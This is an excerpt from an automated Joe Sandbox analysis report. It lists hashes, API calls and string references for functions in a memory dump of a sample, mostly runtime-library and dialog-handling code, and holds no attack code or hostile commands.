Opcode ID: 0b435c17ffd2a7eb2f39c14c3931460f1e15b7718256c1364b49ff4f65d34773
Instruction ID: fb0678ef21452d88ca9325c97b2edf87f8df0055371c830d4a71a71ff540616b
Opcode Fuzzy Hash: 0b435c17ffd2a7eb2f39c14c3931460f1e15b7718256c1364b49ff4f65d34773
Instruction Fuzzy Hash: 7461AA71600F086BDA389A68AC91BBF7394EB11380F14061FE7A3DF391D6A1DF4A9715

Function 00CD4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction ID: 82eeefe8867dc9323a6a1fbb70973d82510a4393d294a7bac27c34a1ba96bd12
Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction Fuzzy Hash: 26516760600F455BDF3856A88556FBF67C59B12300F18082BEBA3DB792C625FF45E3A2

Function 00CBEFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17cca0353eceb28ec7fb49d329231b23b08a8ba4c1ae0623540482ee945e9ac2
Instruction ID: 08de14cdf645858243e7f2440a7958401b7c0f79f05d19cbb6ee528ccdf31997
Opcode Fuzzy Hash: 17cca0353eceb28ec7fb49d329231b23b08a8ba4c1ae0623540482ee945e9ac2
Instruction Fuzzy Hash: 0151D2315083D58AD702DF28D9804AEBFF0AE9A314F4909ADE4D95B353C231DB4ADB62

Function 00CC00B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4441376817896fe9a24be1a3e2796e8271c2ea2e9af23c11e07f5af987a3b5e7
Instruction ID: a13309c01376a870a75bc47c94ed5bc389a5dfd70e185256b126163c91a8fc6c
Opcode Fuzzy Hash: 4441376817896fe9a24be1a3e2796e8271c2ea2e9af23c11e07f5af987a3b5e7
Instruction Fuzzy Hash: DF51E0B1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3340D735EA59CB9A

Function 00CC3E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: 432967320d62bc3c0483947919a1931c1e2a20d0a87f5ae45085c00d5ebea118
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: 193108B1A147468FCB18DF68D8516AEBBE0FB95304F10892DE4D9C7742C735EA0ACB91

Function 00CBE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00CBE30E

Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5

Part of subcall function 00CC1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00CF1030,?,00CBD928,00000000,?,00000050,00CF1030), ref: 00CC1DC4

_strlen.LIBCMT ref: 00CBE32F
SetDlgItemTextW.USER32(?,00CEE274,?), ref: 00CBE38F
GetWindowRect.USER32(?,?), ref: 00CBE3C9
GetClientRect.USER32(?,?), ref: 00CBE3D5
GetWindowLongW.USER32(?,000000F0), ref: 00CBE475
GetWindowRect.USER32(?,?), ref: 00CBE4A2
SetWindowTextW.USER32(?,?), ref: 00CBE4DB
GetSystemMetrics.USER32(00000008), ref: 00CBE4E3
GetWindow.USER32(?,00000005), ref: 00CBE4EE
GetWindowRect.USER32(00000000,?), ref: 00CBE51B
GetWindow.USER32(00000000,00000002), ref: 00CBE58D

Strings

CAPTION, xrefs: 00CBE4BD
$%s:, xrefs: 00CBE302
d, xrefs: 00CBE3F5

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: dccb80c5b371281da3ecb64b4d734e90ad476ebe3757663f3961231a62fd721f
Instruction ID: d69ce58154c1271726c917b9b4fd09ad1600cbe29d6fae73567c5892672f120f
Opcode Fuzzy Hash: dccb80c5b371281da3ecb64b4d734e90ad476ebe3757663f3961231a62fd721f
Instruction Fuzzy Hash: 1881B371108341AFD710DFA8CC89AAFBBE9EBC8B04F04491DFA95D7251D731E9458B62

Function 00CDCB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00CDCB66

Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC71E
Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC730
Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC742
Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC754
Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC766
Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC778
Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC78A
Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC79C
Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC7AE
Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC7C0
Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC7D2
Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC7E4
Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC7F6

_free.LIBCMT ref: 00CDCB5B

Part of subcall function 00CD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?), ref: 00CD8DE2
Part of subcall function 00CD8DCC: GetLastError.KERNEL32(?,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?,?), ref: 00CD8DF4

_free.LIBCMT ref: 00CDCB7D
_free.LIBCMT ref: 00CDCB92
_free.LIBCMT ref: 00CDCB9D
_free.LIBCMT ref: 00CDCBBF
_free.LIBCMT ref: 00CDCBD2
_free.LIBCMT ref: 00CDCBE0
_free.LIBCMT ref: 00CDCBEB
_free.LIBCMT ref: 00CDCC23
_free.LIBCMT ref: 00CDCC2A
_free.LIBCMT ref: 00CDCC47
_free.LIBCMT ref: 00CDCC5F

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: e2941b33b8ccb38453ec8f1be40318b8c8a3e33367e08476b8f618ecb0006bfe
Instruction ID: e454c8d9c19927b17821d7b3a659a0633a8913839828daf6bddf7867fbf456e9
Opcode Fuzzy Hash: e2941b33b8ccb38453ec8f1be40318b8c8a3e33367e08476b8f618ecb0006bfe
Instruction Fuzzy Hash: 89314D31600207AFEB20AA39D886B5AB7E9AF94310F10441BE368D7392DF75ED44DB10

Function 00CC9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00CC9736
_wcslen.LIBCMT ref: 00CC97D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00CC97E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00CC9806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CC982D

Strings

</html>, xrefs: 00CC97B7
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00CC9760
<html>, xrefs: 00CC9755, 00CC978E
utf-8"></head>, xrefs: 00CC976B

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: 17b08c1c088257d204675d0e8d3d84789f77525d1ace45f28944944c3c2b5903
Instruction ID: 19fe79f5aca1cce7293d9164d55bd749873e7df5b7cbddfb1ce787921debf298
Opcode Fuzzy Hash: 17b08c1c088257d204675d0e8d3d84789f77525d1ace45f28944944c3c2b5903
Instruction Fuzzy Hash: 8E3135325093817BE725AB21DC4AF6FB7A8EF42310F14011EF611972D2EB74DA0583AA

Function 00CCD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00CCD6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 00CCD6ED

Part of subcall function 00CC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CBC116,00000000,.exe,?,?,00000800,?,?,?,00CC8E3C), ref: 00CC1FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 00CCD709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CCD720
GetObjectW.GDI32(00000000,00000018,?), ref: 00CCD734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CCD75D
DeleteObject.GDI32(00000000), ref: 00CCD764
GetWindow.USER32(00000000,00000002), ref: 00CCD76D

Strings

STATIC, xrefs: 00CCD6F3

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 5cb6d6bf2017a306269d10975699114073898d4bcb57ec57a45a4e37600880df
Instruction ID: 07b4ac58bd97f63704941b695c2f3c51d7f9a73ecb86f0ab200e8c5b6023f511
Opcode Fuzzy Hash: 5cb6d6bf2017a306269d10975699114073898d4bcb57ec57a45a4e37600880df
Instruction Fuzzy Hash: 171124721407107BE6206B70DC4AFEF769CAB04711F008128FA12E2196DA74CB4753B5

Function 00CD96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CD9705

Part of subcall function 00CD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?), ref: 00CD8DE2
Part of subcall function 00CD8DCC: GetLastError.KERNEL32(?,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?,?), ref: 00CD8DF4

_free.LIBCMT ref: 00CD9711
_free.LIBCMT ref: 00CD971C
_free.LIBCMT ref: 00CD9727
_free.LIBCMT ref: 00CD9732
_free.LIBCMT ref: 00CD973D
_free.LIBCMT ref: 00CD9748
_free.LIBCMT ref: 00CD9753
_free.LIBCMT ref: 00CD975E
_free.LIBCMT ref: 00CD976C

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 825740f477706f96d8f4d5c94c1b6d02edd62a37b67f30f3259fda5fc59bf0a7
Instruction ID: 893dbb4b8042f665db63b59044348a618755cae58b9c9c293bdb8260748b1448
Opcode Fuzzy Hash: 825740f477706f96d8f4d5c94c1b6d02edd62a37b67f30f3259fda5fc59bf0a7
Instruction Fuzzy Hash: 4611B97511010ABFCB01EF54C842CDD3BB6EF58350B5155A2FB084F2A2DE31DE54AB84

Function 00CD2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00CD2F50
___TypeMatch.LIBVCRUNTIME ref: 00CD305E
_UnwindNestedFrames.LIBCMT ref: 00CD31B0
CallUnexpected.LIBVCRUNTIME ref: 00CD31CB
_abort.LIBCMT ref: 00CD31D0

Strings

csm, xrefs: 00CD2F87
csm, xrefs: 00CD2EDB
csm, xrefs: 00CD2E6E

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: dcd00629ce4dffc6bad692d051170bac7ea2e3ae652e6281ec7d9f8c9a387db7
Instruction ID: 797a82ca3d73e340518c24f673cf2d0e68e6c40968de80c324cc41967bb2188a
Opcode Fuzzy Hash: dcd00629ce4dffc6bad692d051170bac7ea2e3ae652e6281ec7d9f8c9a387db7
Instruction Fuzzy Hash: 1CB1783190025AEFCF25DFA4C8819AEBBB5EF14310F14455BEA256B312C731EB11DBA2

Function 00CB6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CB6FAA
_wcslen.LIBCMT ref: 00CB7013
_wcslen.LIBCMT ref: 00CB7084

Part of subcall function 00CB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CB7AAB
Part of subcall function 00CB7A9C: GetLastError.KERNEL32 ref: 00CB7AF1
Part of subcall function 00CB7A9C: CloseHandle.KERNEL32(?), ref: 00CB7B00

Strings

\??\, xrefs: 00CB702B
SeRestorePrivilege, xrefs: 00CB6FC2
SeCreateSymbolicLinkPrivilege, xrefs: 00CB6FCC
UNC\, xrefs: 00CB7051

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 97c9eb1a2fd13bbc3e8cf6e8b0663a56baf9e82cb014800aafc417d320c17131
Instruction ID: 9012601b841108aa1eb80a1124ad8599ccab1038b4ef2242c2d6072bdd182f42
Opcode Fuzzy Hash: 97c9eb1a2fd13bbc3e8cf6e8b0663a56baf9e82cb014800aafc417d320c17131
Instruction Fuzzy Hash: 8741E6B1D08384BAEB20E7749D86FEE77AC9F44304F040556FE5AA7182D674AB48E731

Function 00CCB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB1316: GetDlgItem.USER32(00000000,00003021), ref: 00CB135A
Part of subcall function 00CB1316: SetWindowTextW.USER32(00000000,00CE35F4), ref: 00CB1370

EndDialog.USER32(?,00000001), ref: 00CCB610
SendMessageW.USER32(?,00000080,00000001,?), ref: 00CCB637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00CCB650
SetWindowTextW.USER32(?,?), ref: 00CCB661
GetDlgItem.USER32(?,00000065), ref: 00CCB66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CCB67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CCB694

Strings

LICENSEDLG, xrefs: 00CCB5D4

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: e6471c4d2e6a4f9a9d75378555e38439cc062710e193018cbeb9b3c8daf61f05
Instruction ID: d0175ec5135972fdfcae0ecf043e7c83073c12f668c6edabddbbe46d38285c25
Opcode Fuzzy Hash: e6471c4d2e6a4f9a9d75378555e38439cc062710e193018cbeb9b3c8daf61f05
Instruction Fuzzy Hash: 3E218272204305BBE6155FA6ED4BF7B3B6DEB4A741F014018F605D66A0CFA29E02D635

Function 00CCFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,BDC6A8D3,00000001,00000000,00000000,?,?,00CBAF6C,ROOT\CIMV2), ref: 00CCFD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00CBAF6C,ROOT\CIMV2), ref: 00CCFE14
SysAllocString.OLEAUT32(00000000), ref: 00CCFE1F
_com_issue_error.COMSUPP ref: 00CCFE48
_com_issue_error.COMSUPP ref: 00CCFE52
GetLastError.KERNEL32(80070057,BDC6A8D3,00000001,00000000,00000000,?,?,00CBAF6C,ROOT\CIMV2), ref: 00CCFE57
_com_issue_error.COMSUPP ref: 00CCFE6A
GetLastError.KERNEL32(00000000,?,?,00CBAF6C,ROOT\CIMV2), ref: 00CCFE80
_com_issue_error.COMSUPP ref: 00CCFE93

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 5ae981a47ce30430605ef73bb604f90d9ac251e196f43569cb5717351a8a0548
Instruction ID: 9ace5891104e7a3b9e0dcb5a9e4fd0f7c273b888161b17382a513a4fc825843e
Opcode Fuzzy Hash: 5ae981a47ce30430605ef73bb604f90d9ac251e196f43569cb5717351a8a0548
Instruction Fuzzy Hash: 11412971A00249ABDB10DF69CC45FAFBBAAEB44710F10427EF915E7391D734AA01CBA5

Function 00CBAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CBAF29

Strings

Name, xrefs: 00CBB0B0
WQL, xrefs: 00CBAFDC
SELECT * FROM Win32_OperatingSystem, xrefs: 00CBAFCA
Windows 10, xrefs: 00CBB0C2
ROOT\CIMV2, xrefs: 00CBAF5C

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: d86704e08a3fbb90ad34eaf74bf47ca55b2befb984a1f6d4fae04168c5bd4888
Instruction ID: 7faad5a5568ef606c0ed66cbc0f5dbce22e0753f3d5fc41df651dac31692d778
Opcode Fuzzy Hash: d86704e08a3fbb90ad34eaf74bf47ca55b2befb984a1f6d4fae04168c5bd4888
Instruction Fuzzy Hash: A1715A71A00259AFDF14DFA5DC99ABEB7B9FF48310F140159E552A72A0CB70AE41CB60

Function 00CB9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

